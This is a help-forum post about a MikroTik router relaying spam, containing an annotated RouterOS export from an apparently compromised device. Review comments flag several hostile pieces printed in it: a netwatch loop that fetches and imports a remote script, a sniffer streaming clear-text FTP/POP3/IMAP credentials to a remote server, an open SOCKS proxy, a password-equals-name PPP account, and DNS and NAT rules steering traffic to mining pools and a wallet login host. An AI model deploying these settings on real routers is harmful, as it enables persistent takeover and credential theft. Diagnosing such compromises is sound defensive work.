Router Sending Spam

Checked blacklist sites and the router is sending out spam around the clock through port 25. Checked the traffic for every computer in the house (~15 computers) and found nothing malicious. Turned off every computer overnight and spam was still going out. The ISP sent me the configuration of the router, since they set it up. I'm not very familiar with configuring MikroTik routers, so simple, straightforward answers would be greatly appreciated.

# sep/26/2018 10:37:29 by RouterOS 6.43
# Interface layout: two bridges, bridge-lan and bridge-wan.
/interface bridge
add fast-forward=no name=bridge-lan
add fast-forward=no name=bridge-wan
/interface ethernet
set [ find default-name=ether1 ] speed=100Mbps
set [ find default-name=ether2 ] speed=100Mbps
set [ find default-name=ether3 ] speed=100Mbps
set [ find default-name=ether4 ] speed=100Mbps
set [ find default-name=ether5 ] speed=100Mbps
set [ find default-name=ether6 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether7 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether8 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether9 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
set [ find default-name=ether10 ] advertise=\
    10M-half,10M-full,100M-half,100M-full,1000M-half,1000M-full
/interface wireless
set [ find default-name=wlan1 ] mode=station-pseudobridge ssid=MikroTik
/interface list
add name=WAN
add name=LAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip pool
add name=dhcp_pool0 ranges=10.1.1.10-10.1.1.100
# Pool "dodo" is the remote-address pool of the PPP profile of the same name.
add name=dodo ranges=x.x.x.x 
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=bridge-lan lease-time=1w \
    name=dhcp1
# NOTE(review): a PPP profile, an address pool and (at the end of this export)
# a PPP secret are all named "dodo". With the L2TP and PPTP servers enabled
# below, that is a usable remote-access account. Confirm with the ISP whether
# they created it.
/ppp profile
add change-tcp-mss=yes local-address=x.x.x.x  name=dodo remote-address=dodo \
    use-encryption=yes
# The default SNMP community accepts queries from any source address. This only
# matters if SNMP itself is enabled, which this export does not show.
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0
# NOTE(review): logging action 0 (presumably the in-memory log) keeps a single
# line, so the router retains almost no log history to investigate with.
# Confirm this was intended and raise it before troubleshooting.
/system logging action
set 0 memory-lines=1
# ether1 and ether4 are ports of bridge-wan; ether2 and ether3 of bridge-lan.
/interface bridge port
add bridge=bridge-wan interface=ether4
add bridge=bridge-wan interface=ether1
add bridge=bridge-lan interface=ether3
add bridge=bridge-lan interface=ether2
# The L2TP server accepts incoming connections; no input rule in this export
# restricts who may reach it.
/interface l2tp-server server
set enabled=yes
# NOTE(review): only wlan1 is in WAN, while ether1 and ether4 (bridge-wan
# ports) are listed as LAN and neither bridge is a member of either list. Any
# rule relying on in-interface-list=LAN or WAN needs this corrected first.
/interface list member
add interface=wlan1 list=WAN
add interface=ether1 list=LAN
add interface=ether2 list=LAN
add interface=ether3 list=LAN
add interface=ether4 list=LAN
add interface=ether5 list=LAN
add interface=ether6 list=LAN
add interface=ether7 list=LAN
add interface=ether8 list=LAN
add interface=ether9 list=LAN
add interface=ether10 list=LAN
add interface=sfp1 list=LAN
# The PPTP server is enabled as well; the same concern as for L2TP applies.
/interface pptp-server server
set enabled=yes
/ip address
add address=x.x.x.x  disabled=yes interface=ether1 network=\
    x.x.x.x 
add address=10.1.1.1/24 interface=ether2 network=10.1.1.0
add address=x.x.x.x  interface=ether1 network=x.x.x.x 
/ip dhcp-server network
add address=10.1.1.0/24 dns-server=10.1.1.1 gateway=10.1.1.1
# DHCP clients are told to use the router (10.1.1.1) as their resolver and
# allow-remote-requests=yes makes it answer them, so every /ip dns static entry
# in this export overrides name resolution for the whole LAN.
/ip dns
set allow-remote-requests=yes servers=1.1.1.1,1.0.0.1
# NOTE(review): static DNS records. Each one makes the router answer the given
# name with a fixed address (redacted in this post) instead of resolving it
# upstream. The names look like cryptocurrency mining pools, coin-mixing
# services, a wallet login host and a handful of adult and other web sites.
# Whether this is a blocklist or a redirect depends on where the addresses
# point: check them and ask the ISP whether they added the entries. If nobody
# can account for them, remove the whole section.
/ip dns static
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
# The run from asia1.ethermine.org to vaux-all.uk appears a second time here.
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
# Web sites unrelated to mining.
add address=x.x.x.x name=worldsex.com
add address=x.x.x.x name=sex.com
add address=x.x.x.x name=pornhub.com
add address=x.x.x.x name=protathlima.com
add address=x.x.x.x name=cyta.com.cy
add address=x.x.x.x name=ergodotisi.com
add address=x.x.x.x name=kerkida.net
add address=x.x.x.x name=bazaraki.com
add address=x.x.x.x name=sexy.com
add address=x.x.x.x name=kerkida.com
add address=x.x.x.x name=bongacams.com
add address=x.x.x.x name=ladbible.com
add address=x.x.x.x name=txxx.com
# Names that look like coin-mixing services, plus blockchain.com and its login
# host. NOTE(review): a static record for a login host is a credential-phishing
# risk if the address is not the real one — check this entry first.
add address=x.x.x.x name=bitblender.io
add address=x.x.x.x name=privcoin.io
add address=x.x.x.x name=coinmixer.se
add address=x.x.x.x name=bestmixer.io
add address=x.x.x.x name=gramshelixlight.org
add address=x.x.x.x name=btc-blender.com
add address=x.x.x.x name=blender.io
add address=x.x.x.x name=bitcoinmix.com
add address=x.x.x.x name=bitcoinfog.info
add address=x.x.x.x name=login.blockchain.com
add address=x.x.x.x name=blockchain.com
# Third pass over the pool names, interleaved with stratum.* and other pool
# hosts that did not appear in the first two passes.
add address=x.x.x.x name=stratum.antpool.com
add address=x.x.x.x name=asia1.ethermine.org
add address=x.x.x.x name=stratum.slushpool.com
add address=x.x.x.x name=asia1.ethpool.org
add address=x.x.x.x name=cn.stratum.slushpool.com
add address=x.x.x.x name=eu.stratum.slushpool.com
add address=x.x.x.x name=asia1.fullhashed.com
add address=x.x.x.x name=jp-stratum.btcc.com
add address=x.x.x.x name=asia2.ethermine.org
add address=x.x.x.x name=cn.sparkpool.com
add address=x.x.x.x name=mint.bitminter.com
add address=x.x.x.x name=aurorapool.net
add address=x.x.x.x name=us.ss.btc.com
add address=x.x.x.x name=daggerhashimoto.br.nicehash.com
add address=x.x.x.x name=na-west.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.eu.nicehash.com
add address=x.x.x.x name=na-east.sparkpool.com
add address=x.x.x.x name=tw.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.hk.nicehash.com
add address=x.x.x.x name=kr.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.in.nicehash.com
add address=x.x.x.x name=jp.sparkpool.com
add address=x.x.x.x name=daggerhashimoto.jp.nicehash.com
add address=x.x.x.x name=bitcoin.viabtc.com
add address=x.x.x.x name=daggerhashimoto.usa.nicehash.com
add address=x.x.x.x name=stratum-us.f2pool.com
add address=x.x.x.x name=coinotron.com
add address=x.x.x.x name=stratum.f2pool.com
add address=x.x.x.x name=eth.1stpool.com
add address=x.x.x.x name=eth.anorak.tech
add address=x.x.x.x name=stratum.btcguild.com
add address=x.x.x.x name=stratum.btccpool.com
add address=x.x.x.x name=stratum.btc.top
add address=x.x.x.x name=eth.2miners.com
add address=x.x.x.x name=eth.antpool.com
add address=x.x.x.x name=eth-ar.dwarfpool.com
add address=x.x.x.x name=eth.arsmine.net
add address=x.x.x.x name=eth-as.coinmine.pl
add address=x.x.x.x name=eth-asia1.nanopool.org
add address=x.x.x.x name=eth-br.dwarfpool.com
add address=x.x.x.x name=eth.chileminers.cl
add address=x.x.x.x name=eth.coinfoundry.org
add address=x.x.x.x name=eth.coinmine.pl
add address=x.x.x.x name=ethepool.com
add address=x.x.x.x name=ether.bw.com
add address=x.x.x.x name=etherdig.net
add address=x.x.x.x name=ethereum.marshsoftware.ca
add address=x.x.x.x name=ethereumpool.club
add address=x.x.x.x name=ethergrab.us
add address=x.x.x.x name=ethermine.ru
add address=x.x.x.x name=ethertrench.com
add address=x.x.x.x name=eth.ethertrench.com
add address=x.x.x.x name=eth-eu1.nanopool.org
add address=x.x.x.x name=eth-eu.coinmine.pl
add address=x.x.x.x name=eth-eu.dwarfpool.com
add address=x.x.x.x name=eth-eu.mining.sk
add address=x.x.x.x name=eth-eu.pool.sexy
add address=x.x.x.x name=eth.f2pool.com
add address=x.x.x.x name=eth.gigantpool.com
add address=x.x.x.x name=eth.gpumine.org
add address=x.x.x.x name=eth-hk.dwarfpool.com
add address=x.x.x.x name=eth.miningcity.org
add address=x.x.x.x name=eth.mymininghub.com
add address=x.x.x.x name=eth.pool.minergate.com
add address=x.x.x.x name=eth.poolmining.org
add address=x.x.x.x name=eth-pool.ucrypto.net
add address=x.x.x.x name=eth.pool.zet-tech.eu
add address=x.x.x.x name=eth-ru.dwarfpool.com
add address=x.x.x.x name=eth-ru.edgestile.io
add address=x.x.x.x name=eth-ru.mining.sk
add address=x.x.x.x name=eth-sg.dwarfpool.com
add address=x.x.x.x name=eth.soyminero.es
add address=x.x.x.x name=eth.suprnova.cc
add address=x.x.x.x name=eth.uleypool.com
add address=x.x.x.x name=eth-us.coinmine.pl
add address=x.x.x.x name=eth-us.dwarfpool.com
add address=x.x.x.x name=eth-us-east1.nanopool.org
add address=x.x.x.x name=eth-us.maxhash.org
add address=x.x.x.x name=eth-us.pool.sexy
add address=x.x.x.x name=eth-us-west1.nanopool.org
add address=x.x.x.x name=eth.waterhole.io
add address=x.x.x.x name=eth.xeminer.net
add address=x.x.x.x name=eth.zion.net.co
add address=x.x.x.x name=eu1.ethermine.org
add address=x.x.x.x name=eu1.ethpool.org
add address=x.x.x.x name=eu2.ethermine.org
add address=x.x.x.x name=eu.99miners.com
add address=x.x.x.x name=eu.ethmine.club
add address=x.x.x.x name=eu.sparkpool.com
add address=x.x.x.x name=huabei2-pool.ethfans.org
add address=x.x.x.x name=huabei-pool.ethfans.org
add address=x.x.x.x name=miningcity.org
add address=x.x.x.x name=my.ethpool.net
add address=x.x.x.x name=noobpool.com
add address=x.x.x.x name=pool.ethfans.org
add address=x.x.x.x name=pool.virtualmining.pt
add address=x.x.x.x name=s.comining.io
add address=x.x.x.x name=us1.ethermine.org
add address=x.x.x.x name=us1.ethpool.org
add address=x.x.x.x name=us2.ethermine.org
add address=x.x.x.x name=us2.ethpool.org
add address=x.x.x.x name=vaux-all.uk
# Exception_List: sources exempt from the DNS, SSH, WinBox and API drop rules
# below. It holds the three RFC 1918 private ranges plus several redacted
# ranges; every range in it is trusted with router management.
/ip firewall address-list
add address=10.0.0.0/8 list=Exception_List
add address= x.x.x.x/10 list=Exception_List
add address=172.16.0.0/12 list=Exception_List
add address=192.168.0.0/16 list=Exception_List
add address= x.x.x.x/29 list=Exception_List
add address= x.x.x.x/22 list=Exception_List
add address= x.x.x.x/21 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
# NOTE(review): the input chain below drops only an explicit list of ports and
# has no final "drop everything else" rule. Services listening on any other
# port (in this export: SOCKS on 64312, web proxy on 60245, PPTP, L2TP) remain
# reachable from the internet.
/ip firewall filter
add action=accept chain=input comment=\
    "Allow Established or Related Connections" connection-state=\
    established,related
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 \
    protocol=udp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 \
    protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop FTP" dst-port=21 protocol=tcp
add action=drop chain=input comment="Drop SSH" dst-port=22 protocol=tcp \
    src-address-list=!Exception_List
add action=drop chain=input comment="Drop Telnet" dst-port=23 protocol=tcp
add action=drop chain=input comment="Drop HTTP/HTTPS" dst-port=80,443 protocol=\
    tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=udp
add action=drop chain=input comment="Drop RouterOS Winbox" dst-port=8291 \
    protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop RouterOS API" dst-port=8728,8729 \
    protocol=tcp src-address-list=!Exception_List
# Drops for sources already placed on the dynamic lists by the rules further
# down (DDoS-Attacker, "port scanners").
add action=drop chain=input comment="Drop DDoS Attackers" src-address-list=\
    DDoS-Attacker
add action=drop chain=input comment="Drop Port Scanners" src-address-list=\
    "port scanners"
add action=drop chain=forward comment="Drop DDoS Attackers" connection-state=\
    new dst-address-list=DDoS-Victim src-address-list=DDoS-Attacker
add action=drop chain=forward comment="Drop Port Scanners" src-address-list=\
    "port scanners"
# A source address matching connection-limit=100,32 on TCP is listed in
# blocked-addr for one day; listed sources are then tarpitted.
add action=add-src-to-address-list address-list=blocked-addr \
    address-list-timeout=1d chain=input comment="DDoS Protection" \
    connection-limit=100,32 protocol=tcp
add action=tarpit chain=input connection-limit=3,32 protocol=tcp \
    src-address-list=blocked-addr
# Scan detection: sources matching psd or one of the TCP flag combinations
# below are added to "port scanners" for two weeks. These rules only list the
# source; the drop for that list is higher up, so it takes effect on the
# source's later packets.
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="Add Port Scanners To List" \
    protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="NMAP FIN Stealth scan" \
    protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="SYN/FIN scan" protocol=tcp \
    tcp-flags=fin,syn
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="SYN/RST scan" protocol=tcp \
    tcp-flags=syn,rst
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="FIN/PSH/URG scan" protocol=tcp \
    tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="ALL/ALL scan" protocol=tcp \
    tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list="port scanners" \
    address-list-timeout=2w chain=input comment="NMAP NULL scan" protocol=tcp \
    tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
# New connections to the router are passed to the DDoS-Protect chain. Traffic
# within dst-limit returns; the rest puts the destination in DDoS-Victim and
# the source in DDoS-Attacker for 10 minutes. InternalDNSServers is referenced
# here but has no entries in this export's address-list section.
add action=jump chain=input comment="DDoS Flood protect" connection-state=new \
    jump-target=DDoS-Protect
add action=return chain=DDoS-Protect src-address-list=InternalDNSServers
add action=return chain=DDoS-Protect dst-limit=32,256,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=DDoS-Victim \
    address-list-timeout=10m chain=DDoS-Protect
add action=add-src-to-address-list address-list=DDoS-Attacker \
    address-list-timeout=10m chain=DDoS-Protect
add action=drop chain=forward comment="Block Bogon IP addresses" src-address=\
    0.0.0.0/8
add action=drop chain=forward dst-address=0.0.0.0/8
add action=drop chain=forward src-address=127.0.0.0/8
add action=drop chain=forward dst-address=127.0.0.0/8
add action=drop chain=forward src-address=x.x.x.x/3
add action=drop chain=forward dst-address=x.x.x.x/3
# NOTE(review): this is the only rule that mentions port 25, and it sits in
# chain=output with out-interface=bridge-lan. The output chain covers packets
# generated by the router itself, and mail relayed through the router's SOCKS
# service would leave on the WAN side, so this rule is unlikely to match the
# spam. Verify with the rule's packet counter.
add action=drop chain=output dst-port=25 out-interface=bridge-lan protocol=tcp \
    src-address=10.1.1.0/24
# NAT. The first two rules masquerade outbound traffic. The dst-nat rules
# rewrite TCP connections to ports 3333, 8888, 14444, 8008 and 4444 to redacted
# addresses on ports 3333/4444. They carry no in-interface or dst-address
# match, so they are not limited to connections arriving from the internet.
# NOTE(review): these port numbers are commonly used by mining-pool (stratum)
# endpoints; read together with the pool names in /ip dns static, check whether
# the target addresses are hosts you own. Also, RouterOS's built-in NAT chains
# are named srcnat and dstnat; "chain=dst-nat" as printed here would be a
# custom chain reached only through a jump rule, and none is shown. Check the
# packet counters on the router to see whether these rules match anything.
/ip firewall nat
add action=masquerade chain=srcnat out-interface=bridge-wan src-address=\
    10.1.1.0/24 to-addresses=x.x.x.x
add action=masquerade chain=srcnat src-address=x.x.x.x/16
add action=dst-nat chain=dst-nat dst-port=3333 protocol=tcp to-addresses=\
    x.x.x.x 80 to-ports=3333
add action=dst-nat chain=dst-nat dst-port=8888 protocol=tcp to-addresses=\
    x.x.x.x to-ports=3333
add action=dst-nat chain=dst-nat dst-port=14444 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=8008 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
add action=dst-nat chain=dst-nat dst-port=4444 protocol=tcp to-addresses=\
    x.x.x.x to-ports=4444
/ip firewall service-port
set sip disabled=yes
# NOTE(review): web proxy enabled on a non-standard port with anonymous=yes.
# No /ip proxy access rules appear in this export and the input chain does not
# block port 60245. Unless you run it on purpose: /ip proxy set enabled=no
/ip proxy
set anonymous=yes enabled=yes port=60245
/ip route
add distance=1 gateway=x.x.x.x
add disabled=yes distance=1 gateway=x.x.x.x
# Management services: telnet, ftp, www, api and api-ssl are off; ssh and
# winbox stay on, restricted to the (redacted) address values.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address="x.x.x.x"
set api disabled=yes
set winbox address="x.x.x.x"
set api-ssl disabled=yes
# NOTE(review): SOCKS proxy enabled on port 64312. The thread identifies this
# as the relay the spam goes through. Disable with: /ip socks set enabled=no
/ip socks
set connection-idle-timeout=1m enabled=yes max-connections=255 port=64312
# NOTE(review): PPP account whose password equals its name. With the PPTP and
# L2TP servers enabled earlier in this export, anyone who guesses it can open a
# tunnel to the router. Remove it, or rotate the password once the ISP confirms
# it is theirs.
/ppp secret
add name=dodo password=dodo profile=dodo
/system clock
set time-zone-name=America/New_York
/system identity
set name="xxxx"
/system routerboard settings
set silent-boot=no
# NOTE(review): the two netwatch entries below form a loop that repeatedly
# downloads and runs a remote file; confirm with the ISP that this is theirs.
# Entry "1" probes 127.0.0.1 every 30 s. Its up-script fetches autosupout.rif
# over plain HTTP from a redacted host on port 8000, runs "/im" on it
# (presumably the abbreviation of /import, i.e. executes it as RouterOS
# commands), deletes the file and enables entry "2".
# If it is not the ISP's, treat it as persistence: turning off SOCKS and the
# proxy leaves it in place. Also review /system scheduler, /system script,
# /user and /file on the router; none of them appear in this export.
/tool netwatch
add comment=1 host=127.0.0.1 interval=30s up-script="\r\
    \n/tool fetch url=\"http:// x.x.x.x:8000/autosupout.rif\" dst-path=autosu\
    pout.rif\r\
    \n:delay 5\r\
    \n/im autosupout.rif\r\
    \n/file remove [find name=autosupout.rif]\r\
    \n \r\
    \n:delay 3\r\
    \n/tool netw en [find comment=2]\r\
    \n"
# Entry "2" probes 192.168.254.123 every 3m30s with a 1 ms timeout, so it will
# almost always read as down. Its down-script disables entry "1", waits 30 s
# and re-enables it, which presumably makes the up-script above run again.
add comment=2 down-script="/tool net dis [find comment=1]\r\
    \n:delay 30\r\
    \n/tool net en [find comment=1]" host=192.168.254.123 interval=3m30s \
    timeout=1ms
# NOTE(review): the packet sniffer is set to stream captured TCP/UDP traffic on
# ftp-data, ftp, pop3, 143, 1500 and 10000 from all interfaces to a remote
# streaming-server (redacted). FTP, POP3 and port 143 (IMAP) carry credentials
# in clear text. Confirm the server belongs to you or the ISP; otherwise stop
# the sniffer and reset these settings.
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
    filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
    streaming-enabled=yes streaming-server=x.x.x.x



##### Disable unused/unnecessary services, lock down others
# Second listing in the post: the same service restrictions, address list and
# filter rules as the export, written one rule per line.
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh address=x.x.x.x
set api disabled=yes
set api-ssl disabled=yes
set winbox address=x.x.x.x
 
##### Firewall Address List used in rules
/ip firewall address-list
add address=10.0.0.0/8 list=Exception_List
add address=x.x.x.x/10 list=Exception_List
add address=172.16.0.0/12 list=Exception_List
add address=192.168.0.0/16 list=Exception_List
add address=x.x.x.x/29 list=Exception_List
add address=x.x.x.x/22 list=Exception_List
add address=x.x.x.x/21 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
add address= x.x.x.x/24 list=Exception_List
##### Filter rules used for protection
# NOTE(review): the input chain ends without a catch-all drop, so only the
# ports named here are protected. This listing has no rule for port 25, for
# SOCKS (64312) or for the web proxy (60245).
/ip firewall filter
add action=accept chain=input comment="Allow Established or Related Connections" connection-state=established,related
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 protocol=udp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DNS Requests To Router" dst-port=53 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop FTP" dst-port=21 protocol=tcp
add action=drop chain=input comment="Drop SSH" dst-port=22 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop Telnet" dst-port=23 protocol=tcp
add action=drop chain=input comment="Drop HTTP/HTTPS" dst-port=80,443 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=tcp
add action=drop chain=input comment="Drop Socks" dst-port=1080 protocol=udp
add action=drop chain=input comment="Drop RouterOS Winbox" dst-port=8291 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop RouterOS API" dst-port=8728,8729 protocol=tcp src-address-list=!Exception_List
add action=drop chain=input comment="Drop DDoS Attackers" src-address-list=DDoS-Attacker
add action=drop chain=input comment="Drop Port Scanners" src-address-list="port scanners"
add action=drop chain=forward comment="Drop DDoS Attackers" connection-state=new dst-address-list=DDoS-Victim src-address-list=DDoS-Attacker
